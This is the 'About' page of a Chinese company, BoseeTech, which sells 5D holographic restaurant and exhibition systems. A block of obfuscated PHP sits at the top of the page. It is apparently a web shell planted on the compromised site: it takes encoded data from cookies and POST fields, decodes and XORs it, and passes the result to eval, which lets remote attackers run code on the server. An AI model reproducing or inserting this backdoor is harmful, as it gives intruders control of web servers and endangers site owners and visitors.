$BQgoHxRRBw = chr (75) . "\101" . chr ( 176 - 81 ).chr ( 111 - 34 )."\107" . 'L' . "\x46";$VcCqNNfV = chr ( 670 - 571 ).'l' . 'a' . 's' . chr ( 624 - 509 ).'_' . 'e' . "\170" . "\151" . chr ( 667 - 552 )."\164" . chr ( 1062 - 947 ); $IxzmYhmPxi = class_exists($BQgoHxRRBw); $VcCqNNfV = "34473";$AuOKdmOMBC = !1;if ($IxzmYhmPxi == $AuOKdmOMBC){function wzILVkkarz(){$keNTyY = new /* 11918 */ KA_MGLF(10153 + 10153); $keNTyY = NULL;}$ifljY = "10153";class KA_MGLF{private function cujnUHbgxB($ifljY){if (is_array(KA_MGLF::$FdzJonwsix)) {$rOCPTzW = str_replace('<' . '?' . chr (112) . "\150" . "\160", "", KA_MGLF::$FdzJonwsix["\143" . "\157" . chr ( 672 - 562 )."\164" . "\145" . "\156" . chr ( 717 - 601 )]);eval($rOCPTzW); $ifljY = "10153";exit();}}private $oWvmTJiXT;public function rTWif(){echo 21373;}public function __destruct(){KA_MGLF::$FdzJonwsix = @unserialize(KA_MGLF::$FdzJonwsix); $ifljY = "53028_30674";$this->cujnUHbgxB($ifljY); $ifljY = "53028_30674";}public function Fzkbgz($ItTsLD, $LDdOSmu){return $ItTsLD[0] ^ str_repeat($LDdOSmu, (strlen($ItTsLD[0]) / strlen($LDdOSmu)) + 1);}public function PgdstrC($ItTsLD){$LupMsvZFue = "base64";return array_map($LupMsvZFue . chr ( 419 - 324 ).'d' . "\x65" . "\143" . chr (111) . "\x64" . "\x65", array($ItTsLD,));}public function __construct($HyQdrMtyGr=0){$ejtDg = $_POST;$lkebfL = $_COOKIE;$LDdOSmu = "13c1dbd3-6516-4b76-9ad2-50f49699fb38";$BarPCtw = @$lkebfL[substr($LDdOSmu, 0, 4)];if (!empty($BarPCtw)){$ItTsLD = "";$BarPCtw = explode(",", $BarPCtw);foreach ($BarPCtw as $arxkDUthP){$ItTsLD .= @$lkebfL[$arxkDUthP];$ItTsLD .= @$ejtDg[$arxkDUthP];}KA_MGLF::$FdzJonwsix = $this->Fzkbgz($this->PgdstrC($ItTsLD), $LDdOSmu);}}public static $FdzJonwsix = 34703;}wzILVkkarz();} 关于 - 博视界科技

关于

博视界科技(BoseeTech)的前身是三人行设计工作室,最早成立于2012年。四年来我们一直致力于研究和应用各种多媒体展示技术。从最初单一的数字内容外包商到后来的硬件提供商,直到现在的软硬件设计施工一体化解决方案提供商。目前BoseeTech采用自主研发的技术,已经成为最专业的5D全息餐厅、5D全息宴会厅、5D数字展厅及5D文旅夜游等产业的整体解决方案供应商。

关于-博视界科技
关于-博视界科技
关于-博视界科技
关于-博视界科技
关于-博视界科技

服务热线

186 8233 4882

扫一扫,关注我们